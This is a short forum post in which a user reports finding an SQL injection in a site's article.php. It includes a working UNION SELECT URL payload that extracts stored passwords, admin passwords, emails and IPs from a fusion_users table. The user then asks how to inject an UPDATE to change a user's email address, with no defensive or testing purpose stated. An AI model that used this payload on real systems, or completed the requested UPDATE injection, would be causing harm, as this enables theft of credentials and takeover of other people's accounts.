SQL injection - UPDATE

Discuss the many weaknesses of browser security and ways to mitigate the threat

SQL injection - UPDATE

Post by MegAbiT_ on Thu Feb 09, 2012 9:00 am
([msg=64233]see SQL injection - UPDATE[/msg])

Hello ;)


How I add this SQL to URL? I wan't change user email. Original query from MySQL database looks like this:

Code: Select all
UPDATE `fusion040212308`.`fusion_users` SET `user_email` = 'hello@com.no' WHERE `fusion_users`.`user_id` =1;


but I have syntax error. I found SQLi. Do you send me how I add this query to URL? I have this syntax

Code: Select all
/article.php?post_id=0' union all select 1,user_password,3,user_id,user_name,user_email,user_admin_password,user_ip,9,10,11,12,13,14,15,16,17,18 from fusion_users limit 0,1--+


This syntax is good. But I can't add syntax with UPDATE. Limit 0,1 means the user ID is 1.
MegAbiT_
New User
New User
 
Posts: 1
Joined: Thu Feb 09, 2012 8:53 am
Blog: View Blog (0)


Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests